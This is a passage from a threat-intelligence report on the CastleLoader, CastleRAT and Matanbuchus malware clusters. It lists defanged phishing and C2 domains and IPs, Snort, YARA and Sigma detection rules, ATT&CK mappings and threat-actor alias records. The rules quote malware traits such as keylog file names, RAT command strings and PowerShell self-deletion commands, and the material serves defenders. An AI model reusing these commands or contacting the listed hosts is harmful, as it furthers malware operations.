39\n\nloadsschedule[.]com\r\nloadstracking[.]com\r\nloadstrucking[.]com\r\nmcentireinc[.]com\r\nmcloads[.]com\r\nmlxfreightinc[.]com\r\nmrlogsol[.]ca\r\npinaccletruckllc[.]com\r\nrateconfirmations[.]com\r\nredlightninglogistics[.]com\r\nredlightninglogisticsinc[.]com\r\nstarshiplogisticsgroupllc[.]com\r\ntenderloads[.]com\r\ntrucksscheduling[.]com\r\nCluster 1 (TAG-160) IP Addresses Hosting Logistics-Themed Domains:\r\n74[.]119[.]239[.]234\r\n78[.]153[.]155[.]131\r\n162[.]215[.]230[.]96\r\n162[.]215[.]230[.]150\r\n162[.]215[.]241[.]46\r\n162[.]215[.]241[.]215\r\n162[.]251[.]80[.]108\r\n185[.]236[.]20[.]154\r\n192[.]124[.]178[.]74\r\n199[.]79[.]62[.]141\r\n204[.]11[.]58[.]80\r\n207[.]174[.]212[.]141\r\nMatanbuchus C2 IP Addresses:\r\n185[.]39[.]19[.]164\r\nMatanbuchus C2 Domains:\r\ngalaxioflow[.]com\r\nmechiraz[.]com\r\nnicewk[.]com\r\nnimbusvaults[.]com\r\nCluster 2 (TAG-161) Booking.com-Themed Domains:\r\ncheckinastayverify[.]com\r\ncheckinistayverify[.]com\r\ncheckinstayverify[.]com\r\ncheckistayverify[.]com\r\nchecksstayverify[.]com\r\ncheckystayverify[.]com\r\nconfirmahotelastay[.]com\r\nconfirmahotelstay[.]com\r\nconfirmhotelestay[.]com\r\nconfirmhotelistay[.]com\r\nconfirmhotelystay[.]com\r\nconfirmstayon[.]com\r\nconfirmstayonline[.]com\r\nconfirmyhotelstay[.]com\r\nguestaformahub[.]com\r\nguestaformhub[.]com\r\nguestaformsafe[.]com\r\nguestaportalverify[.]com\r\nguestaverifyportal[.]com\r\nguestformahub[.]com\r\nguestformasafe[.]com\r\nguestformhub[.]com\r\nguestformsafe[.]com\r\nguestistayhotel[.]com\r\nguestportalverify[.]com\r\ngueststayhotel[.]com\r\nguestverifyhub[.]com\r\nguestverifylink[.]com\r\nguestverifyportal[.]com\r\nguestystayhotel[.]com\r\nguesutastayhotel[.]com\r\nguesytastayhotel[.]com\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 30 of 39\n\nhoteliguestverify[.]com\r\nhotelistayverify[.]com\r\nhotelyguestverify[.]com\r\nhotelystayverify[.]com\r\nnedpihotel[.]com\r\npilolhotel[.]com\r\nroomiverifaccess[.]com\r\nroomverifaccess[.]com\r\nroomverifiaccess[.]com\r\nservicehotelonline[.]com\r\nverifihubguest[.]com\r\nverifyhubguest[.]com\r\nCluster 2 (TAG-161) IP Addresses Hosting Booking.com-Themed Domains:\r\n77[.]83[.]207[.]55\r\n185[.]39[.]19[.]180\r\n185[.]39[.]19[.]181\r\nOther Domains Linked to Cluster 2 (TAG-161):\r\ncik-ed[.]com\r\ncut-gv[.]com\r\ndip-bo[.]com\r\ndok-ol[.]com\r\ndut-cd[.]com\r\neta-cd[.]com\r\neto-sa[.]com\r\nfir-vp[.]com\r\nfor-es[.]com\r\ngir-vc[.]com\r\ngut-bk[.]com\r\nher-op[.]com\r\nipk-sa[.]com\r\nitp-ce[.]com\r\nkil-it[.]com\r\nkip-er[.]com\r\nmac-ig[.]com\r\nmap-nv[.]com\r\nned-uj[.]com\r\notr-gl[.]com\r\npit-kp[.]com\r\nrol-vd[.]com\r\nsite-bila[.]com\r\nsite-here[.]com\r\nsite-reto[.]com\r\nsite-tilo[.]com\r\nsite-wila[.]com\r\nspu-cr[.]com\r\ntam-cg[.]com\r\nuke-sd[.]com\r\nuki-fa[.]com\r\nwal-ik[.]com\r\nxut-uv[.]com\r\nxyt-ko[.]com\r\nykl-vh[.]com\r\nyt-ko[.]com\r\nzit-fl[.]com\r\nProxy IP Addresses Linked to Cluster 2 (TAG-161):\r\n109[.]104[.]153[.]29\r\n109[.]104[.]153[.]100\r\n109[.]104[.]153[.]193\r\n109[.]104[.]154[.]67\r\nAdditional IP Addresses Linked to Phishing Email Management Tooling:\r\n80[.]64[.]18[.]245\r\n85[.]208[.]84[.]65\r\n88[.]214[.]50[.]83\r\n185[.]39[.]19[.]94\r\nCluster 3 Booking.com-Themed Domains:\r\nbioskbd[.]com\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 31 of 39\n\nblkiesf[.]com\r\nboikfrs[.]com\r\nboiksal[.]com\r\nbookingnewprice109034[.]icu\r\nbookingnewprice204167[.]icu\r\nguest-request16433[.]com\r\nguest-request44565494[.]com\r\nguest-request64533[.]com\r\nguest-request666543[.]com\r\nguest-request677653[.]com\r\nguest-update666532345[.]com\r\nhotelroomprice1039375[.]icu\r\ninfo-guest44567645[.]com\r\ninfo676345677[.]com\r\njustnewdmain[.]com\r\nnewmessage10294[.]com\r\nprogramsbookss[.]com\r\nrequest-info3444[.]com\r\nrequest-info4433345[.]com\r\nrequest345553[.]com\r\nrequest44456776[.]com\r\nupdate-gues3429[.]com\r\nupdate-guest4398317809[.]com\r\nupdate-info14546[.]com\r\nupdate-info3458421[.]com\r\nupdate-info4467[.]com\r\nupdate-info4468765[.]com\r\nupdate-info539156[.]com\r\nupdate-info71556[.]com\r\nupdate-reques898665[.]com\r\nCluster 3 IP Addresses Hosting Booking.com-Themed Domains:\r\n178[.]17[.]57[.]103\r\n192[.]109[.]138[.]102\r\nAppendix I: Snort Rules for CastleLoader\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleLoader Malware Outbound Checkin\"; flow:established,to_server; content:\"GET\"; http_method;\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleLoader Malware Outbound Payload Request\"; flow:established,to_server; content:\"GET\"; http_m\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleLoader Malware Stager Outbound Payload Request\"; flow:established,to_server; content:\"GET\"\r\nalert tcp $EXTERNAL_NET 79 -\u003e $HOME_NET any (msg:\"CastleLoader Malware Inbound Command Retrieval via Finger Service\"; flow:established,to_client; co\r\nAppendix J: Snort Rules for CastleRAT\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 32 of 39\n\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"CastleRAT Malware Outbound Handshake\"; flow:established,to_server; dsize:20; stream_size:server,=\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"Possible CastleRAT Python Malware Outbound Request To IP Geo Location Service ip-api\"; flow:esta\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api\"; flow:e\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api\"; flow:e\r\nalert http $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"Possible CastleRAT C Variant Malware Outbound Request To IP Geo Location Service ip-api\"; flow:e\r\nAppendix K: Snort Rules for Matanbuchus\r\nalert udp $EXTERNAL_NET any -\u003e $HOME_NET any (msg:\"Matanbuchus Loader Inbound DNS Tunneled Data ACK\"; content:\"|AA AA 85 80 00 01 00 01 00 00 00 00\r\nalert tcp $HOME_NET any -\u003e $EXTERNAL_NET any (msg:\"Matanbuchus Loader Malware Outbound C2 Communication\"; flow:established,to_server; content:\"POST|\r\nAppendix L: Yara Rule for CastleLoader\r\nrule MAL_CastleLoader {\r\n meta:\r\n author = \"Insikt Group, Recorded Future\"\r\n date = \"2025-08-06\"\r\n description = \"Detection of the CastleLoader malware executable\"\r\n version = \"1.0\"\r\n reference = \"https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation\"\r\n hash = \"1b6befc65b19a63b4131ce5bcc6e8c0552fe1e1d136ab94bc7d81b3924056156\"\r\n hash = \"202f6b6631ade2c41e4762e5877ce0063a3beabce0c3f8564b6499a1164c1e04\"\r\n hash = \"25e0008aba82690e0f58c9d9fcfbc5d49820aa78d2f7bfcd0b85fb969180fc04\"\r\n hash = \"b45cce4ede6ffb7b6f28f75a0cbb60e65592840d98dcb63155b9fa0324a88be2\"\r\n hash = \"fb9de7448e9e30f717c171f1d1c90ac72828803a16ad385757aeecc853479d3c\"\r\n hash = \"6444f0e3f78254aef663837562d258a2236a77f810ee8d832de7d83e0fdd5783\"\r\n malware = \"CastleLoader\"\r\n malware_id = \"8RF9P9\"\r\n category = \"MALWARE\"\r\n strings:\r\n $vmware_check = { 3D 56 4D 77 61 75 ?? 81 7D F8 72 65 56 4D 0F 85 ?? ?? ?? ?? 81 7D F4 77 61 72 65 }\r\n $api_hashing = { 0F BE 0C 1E 8B C2 F6 C3 01 75 0F C1 E8 03 0F AF C1 8B CA C1 E1 07 33 C1 }\r\n $stack_str_url = { C7 ?5 [1-4] 74 00 74 00 C7 ?5 [1-4] 69 00 6E 00 C7 ?5 [1-4] 67 00 73 00 }\r\n $mov_edx_apihash1 = { BA 44 A0 2D 39 } // CreateMutexW\r\n $mov_edx_apihash2 = { BA 2B C2 86 58 } // GetLastError\r\n $mov_edx_apihash3 = { BA 94 F9 86 F8 } // RtlAllocateHeap\r\n $mov_edx_apihash4 = { BA B2 48 70 60 } // ExitProcess\r\n condition:\r\n uint16(0) == 0x5A4D and all of them\r\n}\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 33 of 39\n\nAppendix M: Yara Rules for CastleRAT\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 34 of 39\n\nrule MAL_CastleRAT_Python {\r\n meta:\r\n author = \"Insikt Group, Recorded Future\"\r\n date = \"2025-08-18\"\r\n description = \"Detection of the python variant of CastleRAT malware\"\r\n version = \"1.0\"\r\n reference = \"https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations\"\r\n reference = \"https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation\"\r\n reference = \"https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview\"\r\n hash = \"94dc0f696a46f3c225b0aa741fbd3b8997a92126d66d7bc7c9dd8097af0de52a\"\r\n hash = \"53775af67e9df206ed3f9c0a3756dbbc4968a77b1df164e9baddb51e61ac82df\"\r\n malware = \"CastleRAT\"\r\n malware_id = \"9WCga-\"\r\n category = \"MALWARE\"\r\n actor = \"TAG-150\"\r\n actor_id = \"9nk6DO\"\r\n strings:\r\n $cmd1 = \"S_CONNECT\" fullword\r\n $cmd2 = \"S_COMMAND\" fullword\r\n $cmd3 = \"S_PING\" fullword\r\n $cmd4 = \"S_CMD\" fullword\r\n $cmd5 = \"S_DELETE\" fullword\r\n $cmd6 = \"S_POWERSHELL\" fullword\r\n $cmd7 = \"S_START_TERMINAL\" fullword\r\n $cmd8 = \"S_SESSION_MESSAGE\" fullword\r\n $cmd9 = \"S_UPLOAD\" fullword\r\n $fun1 = \"CheckElevation():\" fullword\r\n $fun2 = \"GetHWID(\"\r\n $fun3 = \"GetOS(\"\r\n $fun4 = \"GetIpGeo(\"\r\n $fun5 = \"rc4createkeyA(\"\r\n $fun6 = \"EncryptDecryptBufA(\"\r\n $fun7 = \"RecvTimeout(\"\r\n $fun8 = \"Send(\"\r\n $fun9 = \"Connect(\"\r\n $fun10 = \"ThreadPing(\"\r\n $fun11 = \"ThreadRecvTerminal(\"\r\n $fun12 = \"ThreadTerminalSession(\"\r\n $fun13 = \"ThreadUploadFile(\"\r\n $fun14 = \"SelfDelete()\" fullword\r\n condition:\r\n filesize \u003c 50KB and\r\n 7 of ($cmd*) and\r\n 10 of ($fun*)\r\n}\r\nrule MAL_CastleRAT_C {\r\n meta:\r\n author = \"Insikt Group, Recorded Future\"\r\n date = \"2025-08-18\"\r\n description = \"Detection of the C variant of CastleRAT malware\"\r\n version = \"2.0\"\r\n reference = \"https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations\"\r\n reference = \"https://www.ibm.com/think/x-force/dissecting-castlebot-maas-operation\"\r\n reference = \"https://catalyst.prodaft.com/public/report/understanding-current-castleloader-campaigns/overview\"\r\n hash = \"1ff6ee23b4cd9ac90ee569067b9e649c76dafac234761706724ae0c1943e4a75\"\r\n hash = \"e6bcdf375649a7cbf092fcab65a24d832d8725d833e422e28dfa634498b00928\"\r\n hash = \"67cf6d5332078ff021865d5fef6dc61e90b89bc411d8344754247ccd194ff65b\"\r\n hash = \"963c012d56c62093d105ab5044517fdcce4ab826f7782b3e377932da1df6896d\"\r\n hash = \"60125159523c356d711ffa1076211359906e6283e25f75f4cf0f9dc8da6bf7b0\"\r\n hash = \"cf202498b85e6f0ae4dffae1a65acbfec78cc39fce71f831d45f916c7dedfa0c\"\r\n malware = \"CastleRAT\"\r\n malware_id = \"9WCga-\"\r\n category = \"MALWARE\"\r\n actor = \"TAG-150\"\r\n actor_id = \"9nk6DO\"\r\n strings:\r\n $log_tag1 = \"clipboardlog.txt\" fullword wide\r\n $log_tag2 = \"keylog.txt\" fullword wide\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 35 of 39\n\n$wnd_class1 = \"IsabellaWine\" fullword wide\r\n $wnd_class2 = \"camera!\" fullword wide\r\n $log_fmt1 = \"[%02d:%02d %02d.%02d.%02d] %ws\" fullword wide\r\n $log_fmt2 = \"[%02d:%02d %02d.%02d.%02d] \" fullword wide\r\n $log_fmt3 = \"[%02d.%02d.%02d %02d:%02d] \" fullword wide\r\n $s1 = \"(VPN)\" wide ascii\r\n $s2 = \"rundll32 \\\"C:\\\\Windows\\\\System32\\\\shell32.dll\\\" #61\" wide\r\n $s3 = \"\\\"%ws\\\" -no-deelevate\" fullword wide\r\n $s4 = \"IsWindowVisible\" fullword ascii\r\n $s5 = \"UAC_InputIndicatorOverlayWnd\" fullword wide\r\n $s6 = \"www.ip-api.com\" fullword wide\r\n $s7 = \"MachineGuid\" fullword wide\r\n $s8 = \"line/?fields=\" wide\r\n $s9 = \"C:\\\\Windows\\\\System32\\\\cmd.exe\" wide\r\n $s10 = \"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\" fullword wide\r\n condition:\r\n uint16(0) == 0x5a4d and\r\n any of ($log_tag*) and\r\n any of ($wnd_class*) and\r\n any of ($log_fmt*) and\r\n all of ($s*)\r\n}\r\nrule MAL_CastleRAT_Shellcode_Loader {\r\n meta:\r\n author = \"Insikt Group, Recorded Future\"\r\n date = \"2025-10-20\"\r\n description = \"Detection of a python based shellcode loader that runs CastleRAT malware\"\r\n version = \"1.0\"\r\n reference = \"https://www.recordedfuture.com/research/from-castleloader-to-castlerat-tag-150-advances-operations\"\r\n hash = \"058d83fd8834246d6d2a2771e6e0aeb4d4ef8a6984cbe1133f3a569029a4b1f7\"\r\n hash = \"190e673787bfc6e8eeebccd64c8da61747d5be06f87d3aea879118ef1a9f4836\"\r\n malware = \"CastleRAT\"\r\n actor = \"TAG-150\"\r\n actor_id = \"9nk6DO\"\r\n category = \"MALWARE\"\r\n malware_id = \"9WCga-\"\r\n strings:\r\n $s1 = \"SHELL64_OFFSET = \"\r\n $s2 = \"SHELL32_OFFSET = \"\r\n $s3 = \"SHELLFUNC = WINFUNCTYPE\"\r\n $s4 = \"LoadPE_Shell\"\r\n $s5 = \"crt = WinDLL(\\\"msvcrt.dll\\\");\"\r\n $s6 = \"OPEN_EXISTING\" fullword\r\n $s7 = \".VirtualProtect(\"\r\n $s8 = \"offset\"\r\n $s9 = \"from ctypes\"\r\n condition:\r\n filesize \u003c 50KB and $s9 at 0 and all of them\r\n}\r\nAppendix N: CastleRAT Sigma Rules\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 36 of 39\n\ntitle: CastleRAT C Variant Malware Log File Creation\r\nid: 4d785ac8-17fe-4765-b427-9a31073ad1a7\r\nstatus: stable\r\ndescription: Detects CastleRAT C variant malware log file creation events. The log file is used to store output from the keylogger and clipboard stea\r\nreferences:\r\n - https://tria.ge/250701-v6911aykv9\r\n - https://tria.ge/251101-r8f9xstjap\r\nauthor: Insikt Group, Recorded Future\r\ndate: 2025-08-29\r\nlevel: high\r\ntags:\r\n - attack.t1608 # Stage Capabilities\r\n - attack.t1074.001 # Local Data Staging\r\n - attack.t1115 # Clipboard Data\r\n - attack.t1056.001 # Keylogging\r\nlogsource:\r\n product: windows\r\n category: file_event\r\ndetection:\r\n castlerat_logs:\r\n TargetFilename|endswith:\r\n - '\\AppData\\Local\\Temp\\MuuuuuhGer3'\r\n - '\\AppData\\Local\\Temp\\PluhhSuk3'\r\n - '\\AppData\\Local\\Temp\\AsdDsaHaha3'\r\n - '\\AppData\\Local\\Temp\\ChuChuka'\r\n - '\\AppData\\Local\\Temp\\GagikMaraguiSS'\r\n - '\\AppData\\Local\\Temp\\LowUshrSudujes'\r\n - '\\AppData\\Local\\Temp\\RarnuiKarta'\r\n - '\\AppData\\Local\\Temp\\GrazGraznii'\r\n - '\\AppData\\Local\\Temp\\GiveGvein3'\r\n - '\\AppData\\Local\\Temp\\BeruiowdgsouiHTR'\r\n - '\\AppData\\Local\\Temp\\GDSongdsgndohSDU'\r\n - '\\AppData\\Local\\JohniiDepp'\r\n - '\\AppData\\Local\\LuchiiSvet'\r\n - '\\AppData\\Local\\HmmMaybe'\r\n condition: castlerat_logs\r\nfalsepositives:\r\n - Unlikely\r\ntitle: CastleRAT Python Malware Self Deletion\r\nid: 1050a0c4-1110-4b55-938c-0d27259ddd1e\r\nstatus: stable\r\ndescription: Detects the execution of powershell by the Python variant of CastleRAT malware to delete itself.\r\nreferences:\r\n - https://tria.ge/250822-r3a6qaak2t\r\nauthor: Insikt Group, Recorded Future\r\ndate: 2025-08-28\r\ntags:\r\n - attack.t1070.004 # Indicator Removal: File Deletion\r\nlogsource:\r\n product: windows\r\n category: process_creation\r\ndetection:\r\n self_delete:\r\n CommandLine|endswith: 'powershell Start-Sleep -Seconds 4; Remove-Item -Path * -Force; exit'\r\n condition: self_delete\r\nlevel: high\r\nfalsepositives:\r\n - Potential benign installer activity\r\ntitle: CastleRAT C Malware Self Deletion\r\nid: 79268bc8-3220-447d-bc7a-02199bed58e9\r\nstatus: stable\r\ndescription: Detects the execution of powershell by the C variant of CastleRAT malware to delete itself.\r\nreferences:\r\n - https://tria.ge/251101-lh19hstqft/behavioral2\r\nauthor: Insikt Group, Recorded Future\r\ndate: 2025-11-06\r\ntags:\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 37 of 39\n\n- attack.t1070.004 # Indicator Removal: File Deletion\r\nlogsource:\r\n product: windows\r\n category: process_creation\r\ndetection:\r\n self_delete:\r\n CommandLine|endswith: 'powershell Start-Sleep -Seconds 3; Remove-Item -Path * -Force'\r\n condition: self_delete\r\nlevel: high\r\nfalsepositives:\r\n - Potential benign installer activity\r\nAppendix O: MITRE ATT\u0026CK Techniques\r\nTactic: Technique ATT\u0026CK Code\r\nInitial Access: Phishing T1566\r\nInitial Access: Drive-by Compromise T1189\r\nExecution: User Execution: Malicious File T1204.002\r\nExecution: User Execution: Malicious Copy and Paste T1204.004\r\nExecution: Command and Scripting Interpreter: PowerShell T1059.001\r\nExecution: Command and Scripting Interpreter: AutoHotKey \u0026 AutoIT T1059.010\r\nResource Development: Acquire Infrastructure: Domains T1583.001\r\nResource Development: Acquire Infrastructure: Virtual Private Server T1583.003\r\nResource Development: Acquire Infrastructure: Server T1583.004\r\nResource Development: Acquire Access T1650\r\nResource Development: Obtain Capabilities: Tool T1588.002\r\nResource Development: Compromise Accounts: Email Accounts T1586.002\r\nDefense Evasion: Masquerading T1036\r\nCommand-and-Control: Proxy: External Proxy T1090.002\r\nCommand-and-Control: Application Layer Protocol: Web Protocols T1071.001\r\nCommand-and-Control: Ingress Tool Transfer T1105\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 38 of 39\n\nTactic: Technique ATT\u0026CK Code\r\nCollection: Data from Local System T1005\r\nSource: https://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 39 of 39",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries"
	],
	"report_names": [
		"graybravos-castleloader-activity-clusters-target-multiple-industries"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "dfee8b2e-d6b9-4143-a0d9-ca39396dd3bf",
			"created_at": "2022-10-25T16:07:24.467088Z",
			"updated_at": "2026-04-10T02:00:05.000485Z",
			"deleted_at": null,
			"main_name": "Circles",
			"aliases": [],
			"source_name": "ETDA:Circles",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "77b28afd-8187-4917-a453-1d5a279cb5e4",
			"created_at": "2022-10-25T15:50:23.768278Z",
			"updated_at": "2026-04-10T02:00:05.266635Z",
			"deleted_at": null,
			"main_name": "Inception",
			"aliases": [
				"Inception Framework",
				"Cloud Atlas"
			],
			"source_name": "MITRE:Inception",
			"tools": [
				"PowerShower",
				"VBShower",
				"LaZagne"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "8a13b9be-e36d-4d48-9d19-5c93a62f862f",
			"created_at": "2026-03-08T02:00:03.472285Z",
			"updated_at": "2026-04-10T02:00:03.982274Z",
			"deleted_at": null,
			"main_name": "GrayBravo",
			"aliases": [
				"TAG-150"
			],
			"source_name": "MISPGALAXY:GrayBravo",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "1a76ed30-4daf-4817-98ae-87c667364464",
			"created_at": "2022-10-25T16:47:55.891029Z",
			"updated_at": "2026-04-10T02:00:03.646466Z",
			"deleted_at": null,
			"main_name": "IRON LIBERTY",
			"aliases": [
				"ALLANITE ",
				"ATK6 ",
				"BROMINE ",
				"CASTLE ",
				"Crouching Yeti ",
				"DYMALLOY ",
				"Dragonfly ",
				"Energetic Bear / Berserk Bear ",
				"Ghost Blizzard ",
				"TEMP.Isotope ",
				"TG-4192 "
			],
			"source_name": "Secureworks:IRON LIBERTY",
			"tools": [
				"ClientX",
				"Ddex Loader",
				"Havex",
				"Karagany",
				"Loek",
				"MCMD",
				"Sysmain",
				"xfrost"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d9b39228-0d9d-4c1e-8e39-2de986120060",
			"created_at": "2023-01-06T13:46:39.293127Z",
			"updated_at": "2026-04-10T02:00:03.277123Z",
			"deleted_at": null,
			"main_name": "BelialDemon",
			"aliases": [
				"Matanbuchus"
			],
			"source_name": "MISPGALAXY:BelialDemon",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "732597b1-40a8-474c-88cc-eb8a421c29f1",
			"created_at": "2025-08-07T02:03:25.087732Z",
			"updated_at": "2026-04-10T02:00:03.776007Z",
			"deleted_at": null,
			"main_name": "NICKEL GLADSTONE",
			"aliases": [
				"APT38 ",
				"ATK 117 ",
				"Alluring Pisces ",
				"Black Alicanto ",
				"Bluenoroff ",
				"CTG-6459 ",
				"Citrine Sleet ",
				"HIDDEN COBRA ",
				"Lazarus Group",
				"Sapphire Sleet ",
				"Selective Pisces ",
				"Stardust Chollima ",
				"T-APT-15 ",
				"TA444 ",
				"TAG-71 "
			],
			"source_name": "Secureworks:NICKEL GLADSTONE",
			"tools": [
				"AlphaNC",
				"Bankshot",
				"CCGC_Proxy",
				"Ratankba",
				"RustBucket",
				"SUGARLOADER",
				"SwiftLoader",
				"Wcry"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
